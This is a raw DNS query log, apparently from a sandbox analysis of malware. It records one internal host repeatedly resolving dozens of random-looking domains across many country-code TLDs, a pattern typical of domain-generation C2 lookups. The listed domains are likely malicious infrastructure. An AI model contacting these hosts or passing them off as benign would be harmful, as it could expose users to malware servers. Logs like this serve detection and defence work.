                                                                                                                                                                                                            Sep 7, 2024 15:35:48.626132011 CEST192.168.2.31.1.1.10x750cStandard query (0)audewc.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:48.836153030 CEST192.168.2.31.1.1.10x2a98Standard query (0)byamehgekaeek.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:50.025911093 CEST192.168.2.31.1.1.10x7124Standard query (0)iyeyuemksorve.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:50.038750887 CEST192.168.2.31.1.1.10x6065Standard query (0)iyeyuemksorve.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:50.179822922 CEST192.168.2.31.1.1.10x41caStandard query (0)rujygesrs.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:50.438278913 CEST192.168.2.31.1.1.10x2cecStandard query (0)rujygesrs.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:50.726646900 CEST192.168.2.31.1.1.10x2338Standard query (0)dcqir.vgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:51.867315054 CEST192.168.2.31.1.1.10xcd25Standard query (0)csyqosocetow.vgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:53.043881893 CEST192.168.2.31.1.1.10x494fStandard query (0)qdukhasgmus.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:53.208311081 CEST192.168.2.31.1.1.10xab4eStandard query (0)qdukhasgmus.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:53.493738890 CEST192.168.2.31.1.1.10x9dceStandard query (0)tsmmqmmwg.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:54.648479939 CEST192.168.2.31.1.1.10x95b6Standard query (0)uvomuyoigeqh.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:55.848315954 CEST192.168.2.31.1.1.10x356aStandard query (0)olmoutsceagaml.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:57.008577108 CEST192.168.2.31.1.1.10xe6bbStandard query (0)wfnsamu.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:57.047579050 CEST192.168.2.31.1.1.10x116fStandard query (0)wfnsamu.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:57.710973024 CEST192.168.2.31.1.1.10x2663Standard query (0)dqeqoagqqqrc.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:57.983464956 CEST192.168.2.31.1.1.10xa6f1Standard query (0)dqeqoagqqqrc.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:58.102330923 CEST192.168.2.31.1.1.10xb917Standard query (0)gmbcqqwly.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:58.145950079 CEST192.168.2.31.1.1.10x80d6Standard query (0)gmbcqqwly.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:58.289315939 CEST192.168.2.31.1.1.10xd8f6Standard query (0)cjzhc.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:58.620234013 CEST192.168.2.31.1.1.10x639aStandard query (0)cjzhc.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:58.820367098 CEST192.168.2.31.1.1.10x11adStandard query (0)akpzumsigtkmmw.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:58.940479994 CEST192.168.2.31.1.1.10xb70aStandard query (0)akpzumsigtkmmw.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:59.156193972 CEST192.168.2.31.1.1.10x89b5Standard query (0)yfcalywej.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:59.179469109 CEST192.168.2.31.1.1.10xbe88Standard query (0)yfcalywej.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:59.305208921 CEST192.168.2.31.1.1.10x7546Standard query (0)vmklwkrpmmi.vgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:00.447664976 CEST192.168.2.31.1.1.10x6268Standard query (0)cgengcwnm.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:00.460072994 CEST192.168.2.31.1.1.10xdb45Standard query (0)cgengcwnm.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:00.593369007 CEST192.168.2.31.1.1.10x9c71Standard query (0)yiodscs.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:01.757884026 CEST192.168.2.31.1.1.10x170dStandard query (0)wrzeolo.vgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:02.868223906 CEST192.168.2.31.1.1.10xcb0dStandard query (0)blqcoo.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:02.926899910 CEST192.168.2.31.1.1.10x49faStandard query (0)blqcoo.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:03.555000067 CEST192.168.2.31.1.1.10x8addStandard query (0)epjgqyk.vgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:04.695472002 CEST192.168.2.31.1.1.10x7373Standard query (0)eymkhoeguh.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:05.000391006 CEST192.168.2.31.1.1.10xe605Standard query (0)eymkhoeguh.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:05.278096914 CEST192.168.2.31.1.1.10x8445Standard query (0)gmxmotaygsg.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:05.309155941 CEST192.168.2.31.1.1.10x3309Standard query (0)gmxmotaygsg.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:05.445636988 CEST192.168.2.31.1.1.10xe162Standard query (0)neupqnkgba.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:06.633888006 CEST192.168.2.31.1.1.10x658cStandard query (0)zuvblymqiom.vgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:07.805453062 CEST192.168.2.31.1.1.10x75c0Standard query (0)wegkycraooigi.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:09.007811069 CEST192.168.2.31.1.1.10xc07bStandard query (0)ahieeic.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:09.158268929 CEST192.168.2.31.1.1.10x8fcbStandard query (0)ahieeic.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:09.321166992 CEST192.168.2.31.1.1.10x4ea3Standard query (0)owwvasibxygwtk.vgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:10.494934082 CEST192.168.2.31.1.1.10xb673Standard query (0)uutgmfehaouhp.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:10.535121918 CEST192.168.2.31.1.1.10xa178Standard query (0)uutgmfehaouhp.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:10.681853056 CEST192.168.2.31.1.1.10x2d7dStandard query (0)rmydkqgvcvhez.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:10.698436022 CEST192.168.2.31.1.1.10x8c9fStandard query (0)rmydkqgvcvhez.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:11.086287975 CEST192.168.2.31.1.1.10xff5aStandard query (0)cywkjn.vgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:12.230998039 CEST192.168.2.31.1.1.10x2186Standard query (0)udelwggnpcs.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:12.407605886 CEST192.168.2.31.1.1.10xe6f2Standard query (0)udelwggnpcs.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:12.726788044 CEST192.168.2.31.1.1.10x95feStandard query (0)jwgkbq.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:14.133491993 CEST192.168.2.31.1.1.10xcbc4Standard query (0)hyuyvkcxdqtqwe.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:14.232892036 CEST192.168.2.31.1.1.10x101aStandard query (0)hyuyvkcxdqtqwe.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:14.445431948 CEST192.168.2.31.1.1.10x8620Standard query (0)mtvjuwi.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:14.491540909 CEST192.168.2.31.1.1.10xc10aStandard query (0)mtvjuwi.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:14.883527040 CEST192.168.2.31.1.1.10xb793Standard query (0)gurlwrqpctlkiu.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:16.070507050 CEST192.168.2.31.1.1.10x2351Standard query (0)owayaiofn.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:16.262269020 CEST192.168.2.31.1.1.10x31eaStandard query (0)owayaiofn.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:16.398752928 CEST192.168.2.31.1.1.10x31e1Standard query (0)elymkl.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:16.903023958 CEST192.168.2.31.1.1.10x8dd1Standard query (0)elymkl.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:17.023446083 CEST192.168.2.31.1.1.10xf79Standard query (0)xrkwbwyqovesj.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:17.080830097 CEST192.168.2.31.1.1.10x446Standard query (0)xrkwbwyqovesj.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:17.196029902 CEST192.168.2.31.1.1.10x77eStandard query (0)jwimhacdt.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:17.413393021 CEST192.168.2.31.1.1.10x9f3eStandard query (0)jwimhacdt.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:17.789166927 CEST192.168.2.31.1.1.10x48feStandard query (0)oymyeynqyqewcs.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:17.895400047 CEST192.168.2.31.1.1.10x4380Standard query (0)oymyeynqyqewcs.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:18.008584023 CEST192.168.2.31.1.1.10x1d49Standard query (0)qsqwieaqy.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:19.023586035 CEST192.168.2.31.1.1.10x1d49Standard query (0)qsqwieaqy.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:19.152271986 CEST192.168.2.31.1.1.10xa770Standard query (0)qsqwieaqy.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:19.476670980 CEST192.168.2.31.1.1.10x44a1Standard query (0)oukpcbtqgqwoa.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:19.494604111 CEST192.168.2.31.1.1.10x82b3Standard query (0)oukpcbtqgqwoa.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:19.636111975 CEST192.168.2.31.1.1.10x5274Standard query (0)orhwyostw.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:21.039604902 CEST192.168.2.31.1.1.10x771aStandard query (0)ylmed.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:21.065498114 CEST192.168.2.31.1.1.10xb411Standard query (0)ylmed.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:21.352288008 CEST192.168.2.31.1.1.10xf128Standard query (0)pdrwqa.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:21.450246096 CEST192.168.2.31.1.1.10x5e5cStandard query (0)pdrwqa.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:21.571729898 CEST192.168.2.31.1.1.10xf9f0Standard query (0)wiwip.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:22.914643049 CEST192.168.2.31.1.1.10x47b1Standard query (0)iware.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:24.196301937 CEST192.168.2.31.1.1.10x8989Standard query (0)ivoskdmxlinnf.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:25.414022923 CEST192.168.2.31.1.1.10xa910Standard query (0)sgfpiiwog.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:25.584709883 CEST192.168.2.31.1.1.10x5b62Standard query (0)sgfpiiwog.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:25.695305109 CEST192.168.2.31.1.1.10xa059Standard query (0)mcesyrpjcoxcu.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:25.872306108 CEST192.168.2.31.1.1.10x706Standard query (0)mcesyrpjcoxcu.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:26.649025917 CEST192.168.2.31.1.1.10xc1d7Standard query (0)qatewn.vgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:27.821050882 CEST192.168.2.31.1.1.10xf53aStandard query (0)mnaudewcuibyam.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:27.999654055 CEST192.168.2.31.1.1.10x9a44Standard query (0)mnaudewcuibyam.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:28.273469925 CEST192.168.2.31.1.1.10xc392Standard query (0)gekaeekv.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:28.287149906 CEST192.168.2.31.1.1.10xe8f7Standard query (0)gekaeekv.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:28.436321020 CEST192.168.2.31.1.1.10x445eStandard query (0)iyeyuemksorve.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:28.472685099 CEST192.168.2.31.1.1.10x7952Standard query (0)iyeyuemksorve.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:28.586000919 CEST192.168.2.31.1.1.10xf87eStandard query (0)rujygesrs.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:28.839584112 CEST192.168.2.31.1.1.10xc8f9Standard query (0)rujygesrs.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:31.414283037 CEST192.168.2.31.1.1.10x4819Standard query (0)qdukhasgmus.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:31.664414883 CEST192.168.2.31.1.1.10x22c8Standard query (0)qdukhasgmus.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:35.414434910 CEST192.168.2.31.1.1.10xedbfStandard query (0)wfnsamu.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:35.464359045 CEST192.168.2.31.1.1.10x1cfaStandard query (0)wfnsamu.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:35.605747938 CEST192.168.2.31.1.1.10xcb75Standard query (0)dqeqoagqqqrc.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:35.630852938 CEST192.168.2.31.1.1.10x7200Standard query (0)dqeqoagqqqrc.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:35.774154902 CEST192.168.2.31.1.1.10xcda7Standard query (0)gmbcqqwly.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:35.812989950 CEST192.168.2.31.1.1.10xaf85Standard query (0)gmbcqqwly.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:35.992866039 CEST192.168.2.31.1.1.10x5b6cStandard query (0)cjzhc.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:36.328994989 CEST192.168.2.31.1.1.10x8ad8Standard query (0)cjzhc.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:36.683712959 CEST192.168.2.31.1.1.10xbc4fStandard query (0)akpzumsigtkmmw.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:36.927957058 CEST192.168.2.31.1.1.10xddcaStandard query (0)akpzumsigtkmmw.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:37.132939100 CEST192.168.2.31.1.1.10x944cStandard query (0)yfcalywej.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:37.152225018 CEST192.168.2.31.1.1.10x46f1Standard query (0)yfcalywej.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:38.697143078 CEST192.168.2.31.1.1.10x6b85Standard query (0)cgengcwnm.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:38.712131977 CEST192.168.2.31.1.1.10x72Standard query (0)cgengcwnm.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:41.110927105 CEST192.168.2.31.1.1.10xa583Standard query (0)blqcoo.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:41.302042961 CEST192.168.2.31.1.1.10x8694Standard query (0)blqcoo.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:42.742140055 CEST192.168.2.31.1.1.10x4179Standard query (0)eymkhoeguh.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:42.946495056 CEST192.168.2.31.1.1.10xd625Standard query (0)eymkhoeguh.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:43.274055004 CEST192.168.2.31.1.1.10x9310Standard query (0)gmxmotaygsg.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:43.443371058 CEST192.168.2.31.1.1.10xbc35Standard query (0)gmxmotaygsg.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:47.332034111 CEST192.168.2.31.1.1.10x2414Standard query (0)ahieeic.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:47.421062946 CEST192.168.2.31.1.1.10x6f97Standard query (0)ahieeic.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:48.680969954 CEST192.168.2.31.1.1.10xdd2eStandard query (0)uutgmfehaouhp.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:48.945554018 CEST192.168.2.31.1.1.10xdd2eStandard query (0)uutgmfehaouhp.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:48.983617067 CEST192.168.2.31.1.1.10xb75fStandard query (0)uutgmfehaouhp.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:49.101531982 CEST192.168.2.31.1.1.10x45fdStandard query (0)rmydkqgvcvhez.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:49.364784002 CEST192.168.2.31.1.1.10x45fdStandard query (0)rmydkqgvcvhez.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:49.383758068 CEST192.168.2.31.1.1.10x84f2Standard query (0)rmydkqgvcvhez.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:50.701255083 CEST192.168.2.31.1.1.10xcabeStandard query (0)udelwggnpcs.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:50.874684095 CEST192.168.2.31.1.1.10x3b23Standard query (0)udelwggnpcs.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:52.304809093 CEST192.168.2.31.1.1.10x740Standard query (0)hyuyvkcxdqtqwe.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:52.538772106 CEST192.168.2.31.1.1.10xc9afStandard query (0)hyuyvkcxdqtqwe.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:52.788858891 CEST192.168.2.31.1.1.10xc9afStandard query (0)hyuyvkcxdqtqwe.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:52.898989916 CEST192.168.2.31.1.1.10x4e44Standard query (0)mtvjuwi.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:53.167172909 CEST192.168.2.31.1.1.10x4e44Standard query (0)mtvjuwi.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:53.749188900 CEST192.168.2.31.1.1.10xe2fbStandard query (0)mtvjuwi.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:55.039427042 CEST192.168.2.31.1.1.10x694fStandard query (0)owayaiofn.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:55.172935009 CEST192.168.2.31.1.1.10x9757Standard query (0)owayaiofn.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:55.353913069 CEST192.168.2.31.1.1.10xdbcfStandard query (0)elymkl.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:55.601351023 CEST192.168.2.31.1.1.10xdbcfStandard query (0)elymkl.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:55.854007006 CEST192.168.2.31.1.1.10x582bStandard query (0)elymkl.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:56.101470947 CEST192.168.2.31.1.1.10x582bStandard query (0)elymkl.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:56.461020947 CEST192.168.2.31.1.1.10xcefbStandard query (0)xrkwbwyqovesj.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:56.471777916 CEST192.168.2.31.1.1.10xe82dStandard query (0)xrkwbwyqovesj.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:56.586122036 CEST192.168.2.31.1.1.10x45baStandard query (0)jwimhacdt.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:56.775409937 CEST192.168.2.31.1.1.10xd3f6Standard query (0)jwimhacdt.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:57.070246935 CEST192.168.2.31.1.1.10x5637Standard query (0)oymyeynqyqewcs.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:57.314639091 CEST192.168.2.31.1.1.10xf83aStandard query (0)oymyeynqyqewcs.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:57.554332018 CEST192.168.2.31.1.1.10xf83aStandard query (0)oymyeynqyqewcs.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:58.914134979 CEST192.168.2.31.1.1.10xbe99Standard query (0)qsqwieaqy.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:58.988159895 CEST192.168.2.31.1.1.10xcf41Standard query (0)qsqwieaqy.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:59.226625919 CEST192.168.2.31.1.1.10x988fStandard query (0)oukpcbtqgqwoa.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:59.238018990 CEST192.168.2.31.1.1.10xd9f4Standard query (0)oukpcbtqgqwoa.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:00.507972002 CEST192.168.2.31.1.1.10x2c5cStandard query (0)ylmed.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:00.694482088 CEST192.168.2.31.1.1.10x7e67Standard query (0)ylmed.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:00.929388046 CEST192.168.2.31.1.1.10x7e67Standard query (0)ylmed.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:01.056138039 CEST192.168.2.31.1.1.10x6cfbStandard query (0)pdrwqa.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:01.245352030 CEST192.168.2.31.1.1.10x2a17Standard query (0)pdrwqa.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:05.023494005 CEST192.168.2.31.1.1.10x834Standard query (0)sgfpiiwog.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:05.190797091 CEST192.168.2.31.1.1.10x8b99Standard query (0)sgfpiiwog.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:05.555108070 CEST192.168.2.31.1.1.10x8fccStandard query (0)mcesyrpjcoxcu.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:05.822154045 CEST192.168.2.31.1.1.10x8fccStandard query (0)mcesyrpjcoxcu.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:05.831479073 CEST192.168.2.31.1.1.10x5cf4Standard query (0)mcesyrpjcoxcu.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:07.242945910 CEST192.168.2.31.1.1.10x75e5Standard query (0)mnaudewcuibyam.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:07.492510080 CEST192.168.2.31.1.1.10x75e5Standard query (0)mnaudewcuibyam.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:07.510132074 CEST192.168.2.31.1.1.10x8b92Standard query (0)mnaudewcuibyam.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:07.632882118 CEST192.168.2.31.1.1.10x35c6Standard query (0)gekaeekv.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:07.666184902 CEST192.168.2.31.1.1.10x7bddStandard query (0)gekaeekv.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:07.789793015 CEST192.168.2.31.1.1.10x6635Standard query (0)iyeyuemksorve.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:07.806539059 CEST192.168.2.31.1.1.10xd1cbStandard query (0)iyeyuemksorve.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:07.930742025 CEST192.168.2.31.1.1.10xa996Standard query (0)rujygesrs.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:08.099911928 CEST192.168.2.31.1.1.10x9badStandard query (0)rujygesrs.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:10.705826998 CEST192.168.2.31.1.1.10xeee1Standard query (0)qdukhasgmus.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:10.944920063 CEST192.168.2.31.1.1.10xeee1Standard query (0)qdukhasgmus.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:10.988043070 CEST192.168.2.31.1.1.10x95d4Standard query (0)qdukhasgmus.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:14.867784023 CEST192.168.2.31.1.1.10x6aecStandard query (0)wfnsamu.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:15.135397911 CEST192.168.2.31.1.1.10x6aecStandard query (0)wfnsamu.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:15.206281900 CEST192.168.2.31.1.1.10xb93bStandard query (0)wfnsamu.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:15.351794958 CEST192.168.2.31.1.1.10xa16eStandard query (0)dqeqoagqqqrc.krA (IP address)IN (0x0001)false
